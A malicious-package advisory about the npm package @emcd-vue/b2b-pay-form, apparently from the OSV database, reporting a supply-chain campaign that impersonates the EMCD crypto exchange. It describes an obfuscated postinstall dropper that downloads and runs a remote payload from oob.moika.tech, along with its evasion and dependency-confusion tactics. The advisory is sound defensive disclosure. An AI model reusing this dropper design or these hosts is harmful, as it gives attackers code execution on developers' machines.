OSV-MAL-2026-5164

Malicious code in @emcd-vue/b2b-pay-form (npm)

Part of a coordinated multi-package supply-chain attack impersonating EMCD (emcd.io), a legitimate Russian cryptocurrency exchange and mining pool. The attacker registered the `@emcd-vue` npm scope to distribute multiple malicious packages posing as internal tooling under the "EMCD Platform Engineering" identity. This package was published on the same day as confirmed campaign packages `@emcd-vue/auth` and `@emcd-vue/loans`, which share C2 infrastructure at `oob.moika.tech`. The package description ("Internal HTTP client with retry, auth injection and request tracing") is fabricated; the `@emcd-vue` scope has no affiliation with the real EMCD exchange (`emcd.io`). Campaign packages in this scope use a multi-stage postinstall dropper that downloads and executes a platform-specific payload from `https://oob.moika.tech/payload/{platform}` using a shared secret key, writes the payload to a hidden dot-file in the user's home directory, and beacons installation metadata to `https://oob.moika.tech/report`. --- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (e45e677cee670117b0ff7dcdf2f04491cfb61385025a178e197ea35924e9410e) @emcd-vue/b2b-pay-form ships an obfuscator.io-encoded scripts/postinstall.js wired as the npm `postinstall` lifecycle hook. On `npm install`, the script builds a platform-keyed URL from `os.platform()`, performs an HTTPS GET of a remote payload, writes it to `os.tmpdir()`, and spawns it via `spawn(process.execPath, [tmpFile], {detached:true}).unref()` — a classic install-time dropper that grants the publisher arbitrary remote code execution on every installing host. An environment-variable kill switch and a TTL-gated JSON cache in the user home directory throttle re-execution to evade detection. The package's stated purpose is an 'Internal HTTP client'; fetching and executing remote Node code is unrelated to that purpose. The package metadata is also fabricated dependency-confusion bait: scope `@emcd-vue` and all referenced domains (`emcd-vue.io`, `github.emcd-vue.io`, `jira.emcd-vue.io`, `docs.emcd-vue.io`, `npm.emcd-vue.io`, `telemetry.emcd-vue.io`) are not owned by any public organization, and the README instructs consumers to point npm at `https://npm.emcd-vue.io` while branding the package as 'Internal package — Platform Engineering Team' — the canonical pattern for targeting orgs whose private internal scope matches `@emcd-vue` or whose CI lazily resolves unknown scopes from the public registry. The postinstall file itself is heavily obfuscated (string-array + RC4-style decoder, control-flow flattening, self-defending function, 109-entry encoded string table), which has no legitimate purpose for a lifecycle script and is consistent with evasion of review.